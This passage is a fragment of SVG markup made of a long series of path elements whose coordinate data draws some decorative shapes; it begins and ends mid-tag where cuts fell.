d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path 